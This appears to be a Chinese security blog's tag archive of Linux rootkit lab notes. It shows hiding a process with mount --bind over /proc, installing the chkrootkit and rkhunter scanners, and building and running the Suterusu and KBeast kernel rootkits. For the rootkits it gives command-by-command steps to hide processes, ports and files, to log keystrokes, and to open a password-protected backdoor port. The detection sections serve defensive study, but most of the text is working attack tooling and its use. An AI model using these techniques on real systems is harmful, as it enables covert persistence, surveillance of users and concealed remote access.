标签归档:rootkit

mount –bind隐藏端口和进程

[root@server120 init]# nc -vv -l -p 2345 &
[root@server120 init]# ps axu | grep 3533 | grep -v grep
root 3533 0.0 0.0 103020 792 pts/1 S 13:46 0:00 nc -vv -l -p 2345
[root@server120 tmp]# netstat -antlp | grep 2345
tcp 0 0 0.0.0.0:2345 0.0.0.0:* LISTEN 3533/nc 
[root@server120 tmp]# lsof -i:2345
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
nc 3533 root 3u IPv4 1753126 0t0 TCP *:dbm (LISTEN)

创建文件夹

[root@server120 tmp]# mkdir /tmp/empty
[root@server120 tmp]# mount --bind /tmp/empty/ /proc/3533
mount: block device /tmp/empty is write-protected, mounting read-only
mount: cannot mount block device /tmp/empty read-only

挂不上,一想是因为前几天测试sudo提权的时候把selinux打开了

[root@server120 tmp]# getenforce 
Enforcing
[root@server120 tmp]# setenforce 0
[root@server120 tmp]# mount --bind /tmp/empty/ /proc/3533

然后再看一下,ps和netstat看不到了。

[root@server120 tmp]# ps axu | grep 3533 | grep -v grep
[root@server120 tmp]# netstat -antlp | grep 2345
tcp 0 0 0.0.0.0:2345 0.0.0.0:* LISTEN - 
[root@server120 tmp]# lsof -i:2345
[root@server120 tmp]#

大小变成了4096

[root@server120 tmp]# ls -ld /proc/3533
drwxr-xr-x. 2 root root 4096 7月 21 14:02 /proc/3533

修复:

[root@server120 tmp]# umount /proc/3533

检查mount:
1)/proc/mounts

[root@server120 tmp]# cat /proc/mounts | grep 3533
/dev/mapper/vg_template1-lv_root /proc/3533 ext4 rw,seclabel,relatime,barrier=1,data=ordered 0 0

2)/proc/$$/mountinfo

[root@server120 tmp]# cat /proc/$$/mountinfo | grep 3533
29 16 253:0 /tmp/empty /proc/3533 rw,relatime - ext4 /dev/mapper/vg_template1-lv_root rw,seclabel,barrier=1,data=ordered

3)mount -l

[root@server120 tmp]# mount -l | grep 3533
/tmp/empty on /proc/3533 type none (rw,bind)

因为mount -l 读取的是/etc/mtab,可以直接删除该条目。所以使用1)和2)更靠谱。

参考文章:
http://www.freebuf.com/articles/network/140535.html

rkhunter与chkrootkit的安装测试(rootkit kbeast环境)

chkrootkit

1、准备gcc编译环境
对于CentOS系统,执行下述三条命令:
yum -y install gcc gcc-c++ make glibc*
2、下载chkrootkit源码
chkrootkit的官方网站为 http://www.chkrootkit.org ,下述下载地址为官方地址。为了安全起见,务必在官方下载此程序:
[root@www ~]# wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
3、解压下载回来的安装包
[root@www ~]# tar zxf chkrootkit.tar.gz
4、编译安装(后文命令中出现的“*”无需替换成具体字符,原样复制执行即可)
[root@www ~]# cd chkrootkit-*
[root@www ~]# make sense
注意,上面的编译命令为make sense。
5、把编译好的文件部署到/usr/local/目录中,并删除遗留的文件
[root@www ~]# cd ..
[root@www ~]# cp -r chkrootkit-* /usr/local/chkrootkit
[root@www ~]# rm -r chkrootkit-*
至此,安装完毕。
使用方法
安装好的chkrootkit程序位于 /usr/local/chkrootkit/chkrootkit
直接执行
root@vm:~# /usr/local/chkrootkit/chkrootkit
在安装了kbeast的系统上测试,发现检测不到,效果不如rkhunter好。

rkhunter

http://sourceforge.net/projects/rkhunter/files/
1)安装
tar -xvf rkhunter-1.4.0.tar.gz
cd rkhunter-1.4.0
./installer.sh –install
在安装了kbeast的系统上测试,可以成功检测到。
/usr/local/bin/rkhunter –check -sk
[19:50:27] Rootkit checks…
[19:50:27] Rootkits checked : 389
[19:50:27] Possible rootkits: 1
[19:50:27] Rootkit names : KBeast Rootkit
2)在线升级rkhunter
rkhunter是通过一个含有rootkit名字的数据库来检测系统的rootkits漏洞, 所以经常更新该数据库非常重要, 你可以通过下面命令来更新该数据库:
执行命令:
rkhunter –update
3)检测最新版本
让 rkhunter 保持在最新的版本;
执行命令:
rkhunter –versioncheck

内核级rootkit Suterusu的安装与使用

下载地址:https://github.com/citypw/suterusu/
An LKM rootkit targeting Linux 2.6/3.x on x86(_64), and ARM
功能列表:

Get root
$ ./sock 0
Hide PID
$ ./sock 1 [pid]
Unhide PID
$ ./sock 2 [pid]
Hide TCPv4 port
$ ./sock 3 [port]
Unhide TCPv4 port
$ ./sock 4 [port]
Hide TCPv6 port
$ ./sock 5 [port]
Unhide TCPv6 port
$ ./sock 6 [port]
Hide UDPv4 port
$ ./sock 7 [port]
Unhide UDPv4 port
$ ./sock 8 [port]
Hide UDPv6 port
$ ./sock 9 [port]
Unhide UDPv6 port
$ ./sock 10 [port]
Hide file/directory
$ ./sock 11 [name]
Unhide file/directory
$ ./sock 12 [name]

在CentOS6.5 64位下测试:
1)

[root@vincent suterusu-master]# make linux-x86_64 KDIR=/lib/modules/$(uname -r)/build //注意这里是 linux-x86_64
make ARCH=x86_64 EXTRA_CFLAGS="-D_CONFIG_X86_64_ " -C /lib/modules/2.6.32-642.1.1.el6.x86_64/build M=/tmp/suterusu-master modules
make[1]: Entering directory `/usr/src/kernels/2.6.32-642.1.1.el6.x86_64'
CC [M] /tmp/suterusu-master/main.o
CC [M] /tmp/suterusu-master/util.o
CC [M] /tmp/suterusu-master/module.o
LD [M] /tmp/suterusu-master/suterusu.o
Building modules, stage 2.
MODPOST 1 modules
CC /tmp/suterusu-master/suterusu.mod.o
LD [M] /tmp/suterusu-master/suterusu.ko.unsigned
NO SIGN [M] /tmp/suterusu-master/suterusu.ko
make[1]: Leaving directory `/usr/src/kernels/2.6.32-642.1.1.el6.x86_64'

2)

[root@vincent suterusu-master]# gcc sock.c -o sock
sock.c: 在函数‘main’中:
sock.c:205: 警告:隐式声明与内建函数‘strlen’不兼容
sock.c:220: 警告:隐式声明与内建函数‘strlen’不兼容

3)

[root@vincent suterusu-master]# insmod suterusu.ko

隐藏进程:

[root@vincent suterusu-master]# ./sock 1 5542
Hiding PID 5542

隐藏文件:
注意文件的隐藏只是针对文件名,也就是比如你想隐藏文件x,那么所有目录下的x都会被隐藏

[root@vincent suterusu-master]# ./sock 11image.php
Hiding file/dir ../image.php

隐藏连接:

[root@vincent suterusu-master]# netstat -ano | grep 49745
tcp 0 0 0.0.0.0:49745 0.0.0.0:* LISTEN off (0.00/0/0)
[root@vincent suterusu-master]# ./sock 3 49745
Hiding TCPv4 port 49745
[root@vincent suterusu-master]# netstat -ano | grep 49745
[root@vincent suterusu-master]#

内核级rootkit Kbeast的安装与使用

下载地址:

http://core.ipsecs.com/rootkit/kernel-rootkit/kbeast-v1/

功能如下:

> Hiding this loadable kernel module
> Hiding files/directory
> Hiding process (ps, pstree, top, lsof)
> Hiding socket and connections (netstat, lsof)
> Keystroke logging to capture user activity
> Anti-kill process
> Anti-remove files
> Anti-delete this loadable kernel modules
> Local root escalation backdoor
> Remote binding backdoor hidden by the kernel rootkit

安装脚本支持的内核版本有2.6.16, 2.6.18, 2.6.32, and 2.6.35。
安装步骤如下:

> wget http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz
> tar zxvf ipsecs-kbeast-v1.tar.gz
> cd kbeast-v1/
> modify config.h to meet your requirement, remember that _MAGIC_NAME_
must be user with sh/bash shell
> In order to install in kernel 2.6.16 or 2.6.18, execute ./setup build 0
> In order to install in kernel 2.6.32 or 2.6.35, execute ./setup build
(actually it should work for the recent kernel)
> In order to install in kernel 2.6.9, edit .cc1 file to remove all sys_unlinkat()
related code, modify syscall table address manually, then execute ./setup build 0

需要注意的是重启后就会失效,所以需要加入开机启动中。

CentOS5.5下测试
测试机器内核:
yum install kernel kernel-devel gcc
1)安装


需要注意:
早配置文件config.h中#define _MAGIC_NAME_ “vincent”一定要是一个有/bin/bash的账户。

#define _H4X_PATH_ "/usr/_h4x_" 路径
#define _LOGFILE_ "acctlog" 键盘记录
#define _HIDE_PORT_ 13377 后门端口
#define _RPASSWORD_ "h4x3d" 后门密码

2)后门连接
使用nmap扫描,发现13377端口开放

[root@vincent ~]# nmap -p- 172.16.100.153

Starting Nmap 5.51 ( http://nmap.org ) at 2016-05-31 18:48 CST
Nmap scan report for 172.16.100.153
Host is up (0.000041s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
791/tcp open unknown
13377/tcp open unknown

直接使用telnet连接后门

123

3)连接隐藏
使用netstat查看,连接是隐藏的

[root@localhost usr]# netstat -ano | grep 13377
[root@localhost usr]#

4)文件隐藏
/usr/_h4x_是隐藏的,ll无法查看,可以cd到这个目录下

[root@localhost usr]# ll /usr/
总计 216
drwxr-xr-x 2 root root 49152 03-23 01:24 bin
drwxr-xr-x 2 root root 4096 2010-01-27 etc
drwxr-xr-x 2 root root 4096 2010-01-27 games
drwxr-xr-x 37 root root 4096 03-23 00:40 include
drwxr-xr-x 6 root root 4096 03-22 23:13 kerberos
drwxr-xr-x 67 root root 20480 03-23 01:24 lib
drwxr-xr-x 94 root root 40960 03-23 01:24 lib64
drwxr-xr-x 10 root root 4096 03-23 01:24 libexec
drwxr-xr-x 12 root root 4096 03-22 23:12 local
drwxr-xr-x 2 root root 16384 03-23 01:24 sbin
drwxr-xr-x 197 root root 4096 03-22 23:31 share
drwxr-xr-x 4 root root 4096 03-22 23:12 src
lrwxrwxrwx 1 root root 10 03-22 23:12 tmp -> ../var/tmp
drwxr-xr-x 3 root root 4096 03-22 23:12 X11R6
[root@localhost usr]# cd /usr/_h4x_
[root@localhost _h4x_]# ls
acctlog.0 config.h ipsecs-kbeast-v1.cc1 ipsecs-kbeast-v1.mod.o Makefile README.TXT
acctlog.500 init ipsecs-kbeast-v1.ko ipsecs-kbeast-v1.o Module.markers setup
bd-ipsecs-kbeast-v1.c ipsecs-kbeast-v1.c ipsecs-kbeast-v1.mod.c LICENSE Module.symvers

5)键盘记录

[root@localhost _h4x_]# cat acctlog.0
[30/03/2016-14:20:06] - [UID = 0 ] bash > ps aux
[30/03/2016-14:20:33] - [UID = 0 ] bash > [UP] | grep h4x
[30/03/2016-14:21:02] - [UID = 0 ] bash > ps xua | grep 3617
[30/03/2016-14:21:11] - [UID = 0 ] bash > ps -ef

6)进程隐藏
直接ps查看无法看到该进程,但是grep可以看到。

[root@localhost _h4x_]# ps xua | grep h4x
vincent 3617 0.0 0.1 66108 1584 ? Ss 15:20 0:00 ./_h4x_bd

将ps aux重定向到文件中,也可以看到。

[root@localhost _h4x_]# ps xua > /tmp/ps.txt
[root@localhost _h4x_]# cat /tmp/ps.txt | grep h4x
vincent 3617 0.0 0.1 66108 1584 ? Ss 15:20 0:00 ./_h4x_bd